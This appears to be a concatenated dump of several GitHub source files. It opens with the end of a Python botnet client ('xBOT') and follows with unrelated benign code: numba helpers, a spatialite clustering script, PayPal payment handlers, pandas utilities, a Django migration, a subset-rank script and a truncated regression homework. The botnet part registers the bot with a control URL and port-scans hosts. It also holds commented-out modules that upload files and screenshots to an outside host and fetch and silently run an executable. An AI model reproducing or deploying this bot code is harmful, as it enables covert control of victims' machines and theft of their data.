output(botid+": "+str(e),resp)
#file upload module
# def upload(filepath,cmdz,resp,botid):
# try:
# fileupload(filepath,"/data/up.php")
# if platform.system()=="Windows":
# if "\\" in filepath:
# filename=filepath.split('\\')
# filename=filename.pop()
# else:
# filename=filepath
# elif platform.system()=="Darwin" or platform.system()=="Linux":
# if '/' in filepath:
# filename=filepath.split('/')
# filename=filename.pop()
# else:
# filename=filepath
# output(botid+": http://xboz.xxxxx.com/data/files/"+filename,resp)
# output(botid+" xDONE",cmdz)
# except Exception as e:
# output(botid+": "+str(e),resp)
#network module
def network(cmdz,resp,botid):
try:
op=''
if platform.system()=="Windows":
for i in os.popen("ipconfig"):
op=op+str(i)
elif platform.system()=="Darwin" or platform.system()=="Linux":
for i in os.popen("ifconfig"):
op=op+str(i)
output(botid+": "+op,resp)
output(botid+" xDONE",cmdz)
except Exception as e:
output(botid+': '+str(e),resp)
#portscanner module
def portscan(host,cmdz,resp,botid):
try:
op='Starting Port Scanner '
targetIP = gethostbyname(host)
for i in range(20, 5000):
s = socket(AF_INET, SOCK_STREAM)
result = s.connect_ex((targetIP, i))
if(result == 0) :
op=op+'PORT %d: OPEN\n' %(i,)
s.close()
output(botid+": "+op,resp)
output(botid+" xDONE",cmdz)
except Exception as e:
output(botid+": "+str(e),resp)
#screenshot module
# def screenshot(cmdz,resp,botid):
# try:
# if platform.system()=='Linux':
# os.system("gnome-screenshot -f screenshot.png")
# elif platform.system()=='Darwin':
# os.system("screencapture -x -t png /var/TMP/screenshot.png")
# elif platform.system()=='Windows':
# f=urllib2.urlopen("http://xboz.xxxx.com/data/screenshot.exe")
# data=f.read()
# f.close()
# final=open("screenshot.exe", "wb")
# final.write(data)
# final.close()
# info = subprocess.STARTUPINFO()
# info.dwFlags = 1
# info.wShowWindow = 0
# subprocess.Popen("screenshot.exe", startupinfo=info)
# os.remove("screenshot.exe")
# if platform.system()=='Darwin':
# fileupload("/var/TMP/screenshot.png","/screenshot/up.php")
# os.remove("/var/TMP/screenshot.png")
# else:
# fileupload("screenshot.png","/screenshot/up.php")
# os.remove('screenshot.png')
# output(botid+": http://xboz.xxxxx.com/screenshot/screenshot.png",resp)
# output(botid+" xDONE",cmdz)
# except Exception as e:
# output(botid +": "+str(e),resp)
#kill and terminate
#remote file upload
# def fileupload(path,remote_dir):
# data = open(path, 'rb').read()
# encodedData = base64.encodestring( data )
# headers = { "Content-type": "application/x-www-form-urlencoded",
# "Accept": "text/plain",
# }
# params = urllib.urlencode({ u'fileName': os.path.split(path)[1],
# u'data':encodedData})
# conn = httplib.HTTPConnection( "xboz.xxxxx.com")
# conn.request( "POST", remote_dir, params, headers )
# response = conn.getresponse( )
# conn.close( )
#unique bot registration
def bot_reg(actionurl,field):
botid="unknown"
if platform.system()=="Windows":
botid="xBOTW"+str(random.randrange(1,500))
elif platform.system()=="Linux":
botid="xBOTL"+str(random.randrange(501,1000))
elif platform.system()=="Darwin":
botid="xBOTM"+str(random.randrange(1001,1500))
response={field:botid}
try:
dataenc=urllib.urlencode(response)
req=urllib2.Request(actionurl,dataenc)
urllib2.urlopen(req)
except:
botid="nil"
pass
return botid
botid="nil"
while botid=="nil":
botid=bot_reg(actionurl,connected)
if "nil" not in botid:
break
print "xBOT id:"+botid
xbot=check_commands(botid)
xbot.start()
|
[
"noreply@github.com"
] |
zard777.noreply@github.com
|
7e01aa77d4d51c95038ece930c7ba331c6932669
|
c17dfb99ed7e0273ae43a1bd99441906cb8dcf38
|
/utilities/fortran_ports.py
|
5fc0c882f18c6e71db1cd5a4c9eb9725ba220d27
|
[] |
no_license
|
samgill844/gpuastro
|
80d457858dbf43d20f0d37bbf147218d977818d8
|
864f77586e7e43a74e1cba150761a169ecbd56d0
|
refs/heads/master
| 2020-04-19T18:25:47.279379
| 2019-02-05T20:43:39
| 2019-02-05T20:43:39
| 131,284,629
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 314
|
py
|
import numba
@numba.njit(fastmath=True)
def sign(a,b) :
if b >= 0.0 : return abs(a)
return -abs(a)
@numba.njit
def SameSign(a, b) : return ((a== b) & (a==0)) | (a*b>0)
@numba.njit(fastmath=True)
def clip(a, b, c):
if (a < b) : return b
elif (a > c) : return c
else : return a
|
[
"samgill844@gmail.com"
] |
samgill844@gmail.com
|
4c4d7952e9db0f353efbd75b69aeb3904932c516
|
921de16901ec5ce924cf0c01b8af26bba5b4cb66
|
/Hnome-testtask2014-aec34317d9ed/clusterization/tasks.py
|
74288120906af76f7c2ce72697f33697a0e4dccc
|
[] |
no_license
|
RooshRoosh/open_layers_spatialite_testtask
|
b7c36073278d5d7141d10d90751fb5003b32fc13
|
aff30cd09380af8681c034c733cfbcc7acab8417
|
refs/heads/master
| 2021-01-23T13:22:21.387375
| 2014-07-12T11:51:02
| 2014-07-12T11:51:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,376
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'Ruslan Talipov'
import apsw
import json
import logging
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
class ClusterizationTask(object):
def __init__(self, feed_table, cluster_table, distance, start_location,
primitive_count):
# self.connection = sqlite3.Connection('data.sqlite')
self.connection = apsw.Connection('./../data.sqlite')
self.connection.enableloadextension(True)
self.connection.loadextension('/usr/lib/x86_64-linux-gnu/libspatialite.so.5')
self.connection.enableloadextension(False)
self.cur = self.connection.cursor()
self.feed_table = feed_table
self.cluster_table = cluster_table
self.distance = distance
self.start_location= 'POINT(%s %s)' % (start_location[0], start_location[1])
self.primitive_count = primitive_count
def __call__(self, *args, **kwargs):
# Достаём сиротский примитив Для него ищем все сопряжённые
target = self._get_target()
target = self._create_cluster(target)
target_count = 1
while target:
while True:
# создаём кластер
# Для кластера достаём сопряжённые пока это возможно
primitive_list = self._get_neighbor_primitive_list(target)
target = self._merge_object_list(target, primitive_list, is_primitive=True)
logging.info('Осталось %s примитивов' %self.primitive_count)
if not primitive_list:
break
target = self._get_target() # Достаём сиротские примитивы пока пока не кончатся
target = self._create_cluster(target)
target_count+=1
logging.info('Новая цель #%s' % target_count)
logging.warning('Расчёт завершён')
def _get_target(self):
result = self.cur.execute(
'''
SELECT PK_UID, AsGeoJSON(Geometry) FROM %s
WHERE PK_UID IN (
SELECT building_id FROM clusters_to_building
WHERE cluster_id IS NULL LIMIT 1
);
''' % self.feed_table
).fetchall()
if result:
target = result[0]
else:
target = None
return target
def _get_neighbor_primitive_list(self, primitive):
'''
Достаём всех ближайших соседей
'''
self.cur.execute('''
SELECT candidate.PK_UID, AsGeoJSON(candidate.Geometry)
FROM %s AS target, %s AS candidate
WHERE target.PK_UID = ? AND
candidate.PK_UID IN (SELECT building_id FROM clusters_to_building c2b WHERE c2b.cluster_id IS NULL)
AND Distance(target.Geometry, candidate.Geometry) < ?;
''' % (self.cluster_table, self.feed_table),
(primitive[0], self.distance)
)
object_list = [i for i in self.cur] # добавить курсор и возвращать генератор?
if object_list:
logging.info('Для текущей цели найдено %s сопряжённых примитивов' % len(object_list))
return object_list
def _get_neighbor_cluster_list(self, primitive):
'''
Достаём все ближайшие кластера
'''
self.cur.execute('''
SELECT candidate.PK_UID, AsGeoJSON(candidate.Geometry)
FROM %s AS target, %s AS candidate
WHERE target.PK_UID = ? AND
candidate.PK_UID <> target.PK_UID AND
Distance(target.Geometry, candidate.Geometry) < ?;
''' % (self.cluster_table, self.cluster_table),
(primitive[0], self.distance)
)
object_list = [i for i in self.cur] # добавить курсор и возвращать генератор?
if object_list:
logging.info('return %s clusters' % len(object_list))
return object_list
def _merge_object_list(self, target, objects_list=[], is_primitive=True):
'''
Сливаем мультиполигоны
'''
# Сливаем геометрию
target = list(target)
target[1] = json.loads(target[1])
# logging.info(target)
target[1]['coordinates'] = list(target[1]['coordinates'])
for object_ in objects_list:
object_ = list(object_)
object_[1] = json.loads(object_[1])
target[1]['coordinates'] += object_[1]['coordinates']
if is_primitive:
self.primitive_count -= 1
# Добавляем новым примитивам привязку к цели
self.cur.execute(
'''
UPDATE clusters_to_building SET cluster_id = ?
WHERE building_id = ?
''', ( target[0], object_[0])
)
else:
# Перепривязываем примитивы старых кластеров к новому
self.cur.execute(
'''
UPDATE clusters_to_building SET cluster_id = ?
WHERE cluster_id = ?
''', ( target[0], object_[0])
)
# Обновляем новый кластер
target[1] = json.dumps(target[1])
self.cur.execute(
'''
UPDATE clusters SET Geometry=GeomFromGeoJSON('%s')
WHERE PK_UID = %s
''' % (target[1], target[0])
)
target = self.cur.execute(
'SELECT PK_UID, AsGeoJSON(Geometry) FROM clusters WHERE PK_UID = %s' % target[0]
).fetchall()[0]
# logging.info(target)
# Возвращаем новый кластер
return target
def _create_cluster(self, target):
'''
Добавляем новый кластер
входной параметр это запись building
'''
self.cur.execute('''
INSERT INTO clusters (PK_UID,Geometry) VALUES ( Null , GeomFromGeoJSON('%s'));
''' % target[1])
cluster_id = self.cur.execute('''
SELECT PK_UID FROM clusters WHERE Geometry= GeomFromGeoJSON('%s');
''' % target[1]).fetchall()[0][0] # ? <- %s TypeError: You must supply a dict or a sequence
self.cur.execute(
'''
UPDATE clusters_to_building
SET
cluster_id = %s
WHERE building_id = %s;
''' % (cluster_id, target[0])
)
self.primitive_count-=1
return [cluster_id, target[1]] # вернули геометрию исходного building, но уже cluster из одного компонента
if __name__ == '__main__':
task = ClusterizationTask(
feed_table = 'building',#'test_buildings',
cluster_table = 'clusters',
distance = 0.0005,
start_location = (60.607481, 56.834037),
primitive_count = 34869
)
task()
|
[
"newroosh90@gmail.com"
] |
newroosh90@gmail.com
|
39c09e923c0ade28ec0935abdb42a7f887b0bed6
|
9340f09096c9ac6b6d3f78a088382d46520d1bbb
|
/catonmat/payments.py
|
9f1066e1c0921f1e3bd38f72e112b3359e0a865e
|
[] |
no_license
|
stjordanis/catonmat.net
|
ae7c1f23fa16f6d3790aba089f942fd636e806f0
|
7b6287417c6dfc5fb3e885ec89dad94b655154d6
|
refs/heads/master
| 2022-01-15T13:55:33.197379
| 2019-01-19T13:14:33
| 2019-01-19T13:14:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,467
|
py
|
#!/usr/bin/python
#
# Peteris Krumins (peter@catonmat.net)
# http://www.catonmat.net -- good coders code, great reuse
#
# The new catonmat.net website.
#
# Code is licensed under GNU GPL license.
#
from werkzeug import Response
from catonmat.models import PayPalPayments
def awk_book(request):
PayPalPayments('awk_book', request).save()
return Response('ok')
def awk_book_995(request):
PayPalPayments('awk_book_995', request).save()
return Response('ok')
def awk_book_shantanu(request):
PayPalPayments('awk_book_shantanu', request).save()
return Response('ok')
def sed_book(request):
PayPalPayments('sed_book', request).save()
return Response('ok')
def sed_book_shantanu(request):
PayPalPayments('sed_book_shantanu', request).save()
return Response('ok')
def perl_book(request):
PayPalPayments('perl_book', request).save()
return Response('ok')
def june_giveaway(request):
if not 'secret' in request.form:
return Response('secret missing', 400);
if request.form['secret'] != "secret":
return Response('wrong secret', 400);
if not 'first_name' in request.form:
return Response('first_name missing', 400);
if not 'last_name' in request.form:
return Response('last_name missing', 400);
if not 'payer_email' in request.form:
return Response('payer_email missing', 400);
PayPalPayments('awk_book_june', request).save()
return Response('ok')
|
[
"peteris.krumins@gmail.com"
] |
peteris.krumins@gmail.com
|
51e8d73381c01e40aab3045aeb472100d1705ac9
|
cc29008039f27e2f7f26bb3c8d5f821d09c3d0a3
|
/pandas/core/common.py
|
34d7b7e0a2e40c34980990efea43a97664447ba7
|
[
"BSD-3-Clause"
] |
permissive
|
GunioRobot/pandas
|
dc1aea88e51d002984b65d80b3023db681fcc487
|
06c3930d4918088414c160fb8e47717ed5ec1de7
|
refs/heads/master
| 2021-01-18T11:56:56.297578
| 2011-08-23T14:51:36
| 2011-08-23T14:51:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,661
|
py
|
"""
Misc tools for implementing data structures
"""
from cStringIO import StringIO
import itertools
from numpy.lib.format import read_array, write_array
import numpy as np
import pandas._tseries as _tseries
# XXX: HACK for NumPy 1.5.1 to suppress warnings
try:
np.seterr(all='ignore')
except Exception: # pragma: no cover
pass
class PandasError(Exception):
pass
def isnull(input):
'''
Replacement for numpy.isnan / -numpy.isfinite which is suitable
for use on object arrays.
Parameters
----------
arr: ndarray or object value
Returns
-------
boolean ndarray or boolean
'''
if isinstance(input, np.ndarray):
if input.dtype.kind in ('O', 'S'):
# Working around NumPy ticket 1542
shape = input.shape
result = np.empty(shape, dtype=bool)
vec = _tseries.isnullobj(input.ravel())
result[:] = vec.reshape(shape)
else:
result = -np.isfinite(input)
else:
result = _tseries.checknull(input)
return result
def notnull(input):
'''
Replacement for numpy.isfinite / -numpy.isnan which is suitable
for use on object arrays.
Parameters
----------
arr: ndarray or object value
Returns
-------
boolean ndarray or boolean
'''
if isinstance(input, np.ndarray):
return -isnull(input)
else:
return not _tseries.checknull(input)
def _pickle_array(arr):
arr = arr.view(np.ndarray)
buf = StringIO()
write_array(buf, arr)
return buf.getvalue()
def _unpickle_array(bytes):
arr = read_array(StringIO(bytes))
return arr
def null_out_axis(arr, mask, axis):
indexer = [slice(None)] * arr.ndim
indexer[axis] = mask
arr[tuple(indexer)] = np.NaN
#-------------------------------------------------------------------------------
# Lots of little utilities
def _infer_dtype(value):
if isinstance(value, (float, np.floating)):
return float
elif isinstance(value, (bool, np.bool_)):
return bool
elif isinstance(value, (int, np.integer)):
return int
else:
return object
def _is_bool_indexer(key):
if isinstance(key, np.ndarray) and key.dtype == np.object_:
mask = isnull(key)
if mask.any():
raise ValueError('cannot index with vector containing '
'NA / NaN values')
return set([True, False]).issubset(set(key))
elif isinstance(key, np.ndarray) and key.dtype == np.bool_:
return True
elif isinstance(key, list):
try:
return np.asarray(key).dtype == np.bool_
except TypeError: # pragma: no cover
return False
return False
def _default_index(n):
from pandas.core.index import NULL_INDEX
if n == 0:
return NULL_INDEX
else:
return np.arange(n)
def ensure_float(arr):
if issubclass(arr.dtype.type, np.integer):
arr = arr.astype(float)
return arr
def _mut_exclusive(arg1, arg2):
if arg1 is not None and arg2 is not None:
raise Exception('mutually exclusive arguments')
elif arg1 is not None:
return arg1
else:
return arg2
def _ensure_index(index_like):
from pandas.core.index import Index
if not isinstance(index_like, Index):
index_like = Index(index_like)
return index_like
def _any_none(*args):
for arg in args:
if arg is None:
return True
return False
def _all_not_none(*args):
for arg in args:
if arg is None:
return False
return True
def _try_sort(iterable):
listed = list(iterable)
try:
return sorted(listed)
except Exception:
return listed
def set_printoptions(precision=None, column_space=None):
"""
Alter default behavior of DataFrame.toString
precision : int
Floating point output precision
column_space : int
Default space for DataFrame columns, defaults to 12
"""
global _float_format, _column_space
if precision is not None:
float_format = '%.' + '%d' % precision + 'g'
_float_format = lambda x: float_format % x
if column_space is not None:
_column_space = column_space
_float_format = lambda x: '%.4g' % x
_column_space = 12
def _pfixed(s, space, nanRep=None, float_format=None):
if isinstance(s, float):
if nanRep is not None and isnull(s):
if np.isnan(s):
s = nanRep
return (' %s' % s).ljust(space)
if float_format:
formatted = float_format(s)
else:
is_neg = s < 0
formatted = _float_format(np.abs(s))
if is_neg:
formatted = '-' + formatted
else:
formatted = ' ' + formatted
return formatted.ljust(space)
else:
return (' %s' % s)[:space].ljust(space)
def _stringify(col):
# unicode workaround
if isinstance(col, tuple):
return str(col)
else:
return '%s' % col
def _format(s, nanRep=None, float_format=None):
if isinstance(s, float):
if nanRep is not None and isnull(s):
if np.isnan(s):
s = nanRep
return (' %s' % s)
if float_format:
formatted = float_format(s)
else:
is_neg = s < 0
formatted = _float_format(np.abs(s))
if is_neg:
formatted = '-' + formatted
else:
formatted = ' ' + formatted
return formatted
else:
return ' %s' % s
#-------------------------------------------------------------------------------
# miscellaneous python tools
def rands(n):
"""Generates a random alphanumeric string of length *n*"""
from random import Random
import string
return ''.join(Random().sample(string.letters+string.digits, n))
def adjoin(space, *lists):
"""
Glues together two sets of strings using the amount of space requested.
The idea is to prettify.
"""
outLines = []
newLists = []
lengths = [max(map(len, x)) + space for x in lists[:-1]]
# not the last one
lengths.append(max(map(len, lists[-1])))
maxLen = max(map(len, lists))
for i, lst in enumerate(lists):
nl = [x.ljust(lengths[i]) for x in lst]
nl.extend([' ' * lengths[i]] * (maxLen - len(lst)))
newLists.append(nl)
toJoin = zip(*newLists)
for lines in toJoin:
outLines.append(''.join(lines))
return '\n'.join(outLines)
def iterpairs(seq):
"""
Parameters
----------
seq: sequence
Returns
-------
iterator returning overlapping pairs of elements
Example
-------
>>> iterpairs([1, 2, 3, 4])
[(1, 2), (2, 3), (3, 4)
"""
# input may not be sliceable
seq_it = iter(seq)
seq_it_next = iter(seq)
_ = seq_it_next.next()
return itertools.izip(seq_it, seq_it_next)
def indent(string, spaces=4):
dent = ' ' * spaces
return '\n'.join([dent + x for x in string.split('\n')])
def banner(message):
"""
Return 80-char width message declaration with = bars on top and bottom.
"""
bar = '=' * 80
return '%s\n%s\n%s' % (bar, message, bar)
class groupby(dict):
"""
A simple groupby different from the one in itertools.
Does not require the sequence elements to be sorted by keys,
however it is slower.
"""
def __init__(self, seq, key=lambda x:x):
for value in seq:
k = key(value)
self.setdefault(k, []).append(value)
__iter__ = dict.iteritems
def map_indices_py(arr):
"""
Returns a dictionary with (element, index) pairs for each element in the
given array/list
"""
return dict([(x, i) for i, x in enumerate(arr)])
def union(*seqs):
result = set([])
for seq in seqs:
if not isinstance(seq, set):
seq = set(seq)
result |= seq
return type(seqs[0])(list(result))
def difference(a, b):
return type(a)(list(set(a) - set(b)))
def intersection(*seqs):
result = set(seqs[0])
for seq in seqs:
if not isinstance(seq, set):
seq = set(seq)
result &= seq
return type(seqs[0])(list(result))
def _asarray_tuplesafe(values):
if not isinstance(values, (list, np.ndarray)):
values = list(values)
result = np.asarray(values)
if issubclass(result.dtype.type, basestring):
result = np.asarray(values, dtype=object)
if result.ndim == 2:
result = np.empty(len(values), dtype=object)
result[:] = values
return result
|
[
"wesmckinn@gmail.com"
] |
wesmckinn@gmail.com
|
b939f3da2e47723692ad5c2a693a5b8777d312c6
|
9853327016c9fea768a52be5139274894c61d47c
|
/posts/migrations/0004_auto_20190730_0700.py
|
67c85cb42a4d940b88eb07b39d8e4ea6671afbd7
|
[] |
no_license
|
nickhattwick/projectidk
|
53a38fe89f28665d13249f247601005b0b9d1e52
|
d875420adb9119b9d704519353dd8dcdcd5fe016
|
refs/heads/master
| 2020-06-26T19:43:46.133593
| 2019-08-09T06:55:45
| 2019-08-09T06:55:45
| 199,736,293
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 383
|
py
|
# Generated by Django 2.2.3 on 2019-07-30 07:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('posts', '0003_auto_20190730_0659'),
]
operations = [
migrations.AlterField(
model_name='blog',
name='html',
field=models.CharField(max_length=10000),
),
]
|
[
"nhattwick@gmail.com"
] |
nhattwick@gmail.com
|
ce30caa166fd0795475f61197f04454655d131c0
|
abd6656ab5e913b8b5b68fcb8e0c40a7052d78b7
|
/cw6/z2.py
|
8fe0182d59f7f467c30609386bc78d040ddc0907
|
[] |
no_license
|
danskiiiii/ALK
|
4308c516b13955e28cd990a2267049007c0c6a3c
|
9926c0757597bc2c6731118a14110598bd7de2d9
|
refs/heads/master
| 2020-04-26T18:29:50.912053
| 2019-06-07T04:36:53
| 2019-06-07T04:36:53
| 173,746,591
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 466
|
py
|
# Zadanie 2. (0.3 pkt)
# Napisz program obliczający rangę k-elementowego podzbioru T zbioru {1, . . . , n} w porządku
# minimalnych zmian podzbiorów k-elementowych.
from scipy.special import comb as binom
n = int(input('Enter n: '))
subset = [ int(num) for num in input('Enter T: ').split() ]
rank = 0
k = len(subset)
subset.insert(0,0)
for i in range(1,k+1):
rank += (-1)**(k-i) * (binom(subset[i], i, exact=True) - 1)
print(f"rank = {rank}")
|
[
"danielwil@wp.pl"
] |
danielwil@wp.pl
|
22f86f053fb24f645b3d90d46fb117c02bdb3834
|
3c2fb2221aa68af9f909cea2b15ae883dc5f0bee
|
/hw1/h2.py
|
459d91d85e4d18dde074871a60948be2f837cd7a
|
[] |
no_license
|
RAYHOU777/ML2017
|
26c70104a4c8c53d43a56c0399a1988764cd5191
|
d6bae50984350823e63f6e0692205e3801a0f3b9
|
refs/heads/master
| 2021-03-19T16:35:54.539917
| 2017-06-08T14:53:17
| 2017-06-08T14:53:17
| 82,925,627
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19,681
|
py
|
import csv
import numpy as np
import sys
import os
rows =[]
#file = open(sys.argv[1],'r')
with open(sys.argv[1],'r') as csvfile:
reader = csv.reader(csvfile)
lstpm = []
lstpmSO = []
lstpmO3 = []
lstpmO2 = []
lstpmCO = []
lstpmWD = []
for row in reader :
if row[2] =='PM2.5' :
lstpm.append(row[3:27])
if row[2] =='SO2' :
lstpmSO.append(row[3:27])
if row[2] =='O3' :
lstpmO3.append(row[3:27])
if row[2] =='PM10' :
lstpmO2.append(row[3:27])
if row[2] =='CO' :
lstpmCO.append(row[3:27])
if row[2] =='WIND_SPEED' :
lstpmWD.append(row[3:27])
# print len(lstpm)
# print lstpm10[1]
xd_0 = []
xd_1 = []
xd_2 = []
xd_3 = []
xd_4 = []
xd_5 = []
xd_6 = []
xd_7 = []
xd_8 = []
xd10_0 = []
xd10_1 = []
xd10_2 = []
xd10_3 = []
xd10_4 = []
xd10_5 = []
xd10_6 = []
xd10_7 = []
xd10_8 = []
xd10_9 = []
xd10_10 = []
xd10_11 = []
yd = []
i=0
while i < len(lstpm) :
xd_0.insert(i,int(lstpm[i][0]))
xd_1.insert(i,int(lstpm[i][1]))
xd_2.insert(i,int(lstpm[i][2]))
xd_3.insert(i,int(lstpm[i][3]))
xd_4.insert(i,int(lstpm[i][4]))
xd_5.insert(i,int(lstpm[i][5]))
xd_6.insert(i,int(lstpm[i][6]))
xd_7.insert(i,int(lstpm[i][7]))
xd_8.insert(i,int(lstpm[i][8]))
xd10_0.insert(i,float(lstpmSO[i][8]))
xd10_1.insert(i,float(lstpmSO[i][7]))
xd10_2.insert(i,float(lstpmSO[i][6]))
xd10_3.insert(i,float(lstpmSO[i][6]))
xd10_4.insert(i,float(lstpmO3[i][7]))
xd10_5.insert(i,float(lstpmO3[i][8]))
xd10_6.insert(i,float(lstpmCO[i][8]))
xd10_7.insert(i,float(lstpmCO[i][7]))
xd10_8.insert(i,float(lstpmCO[i][6]))
xd10_9.insert(i,float(lstpmCO[i][6]))
xd10_10.insert(i,float(lstpmWD[i][7]))
xd10_11.insert(i,float(lstpmWD[i][8]))
yd.insert(i,int(lstpm[i][9]))
i+=1
# print yd
b = 0.1
w0 = 0.1
w1 = 0.1
w2 = 0.1
w3 = 0.1
w4 = 0.1
w5 = 0.1
w6 = 0.1
w7 = 0.1
w8 = 0.1
w00 = 0.1
w01 = 0.1
w02 = 0.1
w03 = 0.1
w04 = 0.1
w05 = 0.1
w06 = 0.1
w07 = 0.1
w08 = 0.1
w09 = 0.1
w10 = 0.1
w11 = 0.1
lr = 0.5
b_history = [b]
w0_history = [w0]
w1_history = [w1]
w2_history = [w2]
w3_history = [w3]
w4_history = [w4]
w5_history = [w5]
w6_history = [w6]
w7_history = [w7]
w8_history = [w8]
w00_history = [w00]
w01_history = [w01]
w02_history = [w02]
w03_history = [w03]
w04_history = [w04]
w05_history = [w05]
w06_history = [w06]
w07_history = [w07]
w08_history = [w08]
w09_history = [w09]
w10_history = [w10]
w11_history = [w11]
iteration = 5000
b_lr = 0
w0_lr = 0
w1_lr = 0
w2_lr = 0
w3_lr = 0
w4_lr = 0
w5_lr = 0
w6_lr = 0
w7_lr = 0
w8_lr = 0
w00_lr = 0
w01_lr = 0
w02_lr = 0
w03_lr = 0
w04_lr = 0
w05_lr = 0
w06_lr = 0
w07_lr = 0
w08_lr = 0
w09_lr = 0
w10_lr = 0
w11_lr = 0
b_grad_n = 0.0
w0_grad_n = 0.0
w1_grad_n = 0.0
w2_grad_n = 0.0
w3_grad_n = 0.0
w4_grad_n = 0.0
w5_grad_n = 0.0
w6_grad_n = 0.0
w7_grad_n = 0.0
w8_grad_n = 0.0
w00_grad_n = 0.0
w01_grad_n = 0.0
w02_grad_n = 0.0
w03_grad_n = 0.0
w04_grad_n = 0.0
w05_grad_n = 0.0
w06_grad_n = 0.0
w07_grad_n = 0.0
w08_grad_n = 0.0
w09_grad_n = 0.0
w10_grad_n = 0.0
w11_grad_n = 0.0
rate = 0.3
for r in range(iteration):
b_grad = 0.0
w0_grad = 0.0
w1_grad = 0.0
w2_grad = 0.0
w3_grad = 0.0
w4_grad = 0.0
w5_grad = 0.0
w6_grad = 0.0
w7_grad = 0.0
w8_grad = 0.0
w00_grad = 0.0
w01_grad = 0.0
w02_grad = 0.0
w03_grad = 0.0
w04_grad = 0.0
w05_grad = 0.0
w06_grad = 0.0
w07_grad = 0.0
w08_grad = 0.0
w09_grad = 0.0
w10_grad = 0.0
w11_grad = 0.0
for n in range(len(xd_0)):
b_grad = b_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*1.0
w0_grad = w0_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_0[n]
w1_grad = w1_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_1[n]
w2_grad = w2_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_2[n]
w3_grad = w3_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_3[n]
w4_grad = w4_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_4[n]
w5_grad = w5_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_5[n]
w6_grad = w6_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_6[n]
